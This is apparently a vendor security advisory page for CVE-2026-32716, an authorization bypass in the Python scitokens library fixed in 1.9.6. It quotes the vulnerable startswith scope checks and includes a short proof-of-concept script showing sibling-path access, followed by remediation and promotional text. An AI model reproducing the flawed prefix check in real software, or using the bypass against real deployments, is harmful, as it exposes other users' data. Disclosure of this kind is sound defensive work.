CVE-2026-32716

CVE-2026-32716 is a high-severity security vulnerability in scitokens (pip), affecting versions < 1.9.6. It is fixed in 1.9.6.

Summary

The Enforcer incorrectly validates scope paths by using a simple prefix match (startswith). This allows a token with access to a specific path (e.g., /john) to also access sibling paths that start with the same prefix (e.g., /johnathan, /johnny), which is an Authorization Bypass.

Details

File: src/scitokens/scitokens.py
Methods: _validate_scp and _validate_scope

Vulnerable Code Snippets:

In _validate_scp (around line 696):

    for scope in value:
        authz, norm_path = self._check_scope(scope)
        if (self._test_authz == authz) and norm_requested_path.startswith(norm_path):
            return True

In _validate_scope (around line 722):

    for scope in value.split(" "):
        authz, norm_path = self._check_scope(scope)
        if (self._test_authz == authz) and norm_requested_path.startswith(norm_path):
            return True

If norm_path (authorized) is /john and norm_requested_path (requested) is /johnathan, startswith returns True, incorrectly granting access.

PoC


import scitokens
import sys

def poc_scope_bypass():
    """
    Demonstrate an Authorization Bypass vulnerability in scope path checking.
    """
    print("--- PoC: Incorrect Scope Path Checking (Authorization Bypass) ---")
    
    issuer = "https://scitokens.org/unittest"
    enforcer = scitokens.Enforcer(issuer)
    
    # Create a token with access to /john
    token = scitokens.SciToken()
    token['iss'] = issuer
    token['scope'] = "read:/john"
    
    print(f"Authorized path in scope: /john")
    
    # 1. Test access to /john/file (should be allowed)
    print(f"[1] Testing legitimate subpath: /john/file")
    if enforcer.test(token, 'read', '/john/file'):
        print("    -> Access GRANTED (Correct behavior)")
    else:
        print("    -> Access DENIED (Incorrect behavior - should have access to subpaths)")

    # 2. Test access to /johnathan (SHOULD BE DENIED)
    print(f"[2] Testing illegitimate sibling path: /johnathan")
    if enforcer.test(token, 'read', '/johnathan'):
        print("    -> [VULNERABILITY] Access GRANTED! This is an authorization bypass.")
    else:
        print("    -> Access DENIED (Correct behavior - fix is working)")

    # 3. Test access to /johnny (SHOULD BE DENIED)
    print(f"[3] Testing illegitimate sibling path: /johnny")
    if enforcer.test(token, 'read', '/johnny'):
        print("    -> [VULNERABILITY] Access GRANTED! This is an authorization bypass.")
    else:
        print("    -> Access DENIED (Correct behavior - fix is working)")

if __name__ == "__main__":
    # Ensure scitokens from src/ is available
    sys.path.insert(0, "src")
    poc_scope_bypass()

Impact

This bug allows a user to access resources they are not authorized for. For example, if a system uses usernames as top-level directories in a shared storage, a user john might be able to read or write to the directory of user johnathan simply because their names share a prefix.

CVE-2026-32716 has a CVSS score of 8.1 (High). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (1.9.6); upgrading removes the vulnerable code path.

Affected versions

scitokens (< 1.9.6)

Security releases

scitokens → 1.9.6 (pip)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Upgrade scitokens to 1.9.6 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-32716? CVE-2026-32716 is a high-severity security vulnerability in scitokens (pip), affecting versions < 1.9.6. It is fixed in 1.9.6.
  2. How severe is CVE-2026-32716? CVE-2026-32716 has a CVSS score of 8.1 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of scitokens are affected by CVE-2026-32716? scitokens (pip) versions < 1.9.6 is affected.
  4. Is there a fix for CVE-2026-32716? Yes. CVE-2026-32716 is fixed in 1.9.6. Upgrade to this version or later.
  5. Is CVE-2026-32716 exploitable, and should I be worried? Whether CVE-2026-32716 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-32716 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-32716? Upgrade scitokens to 1.9.6 or later.

Other vulnerabilities in scitokens

CVE-2026-32727CVE-2026-32716

Stop the waste.
Protect your environment with Kodem.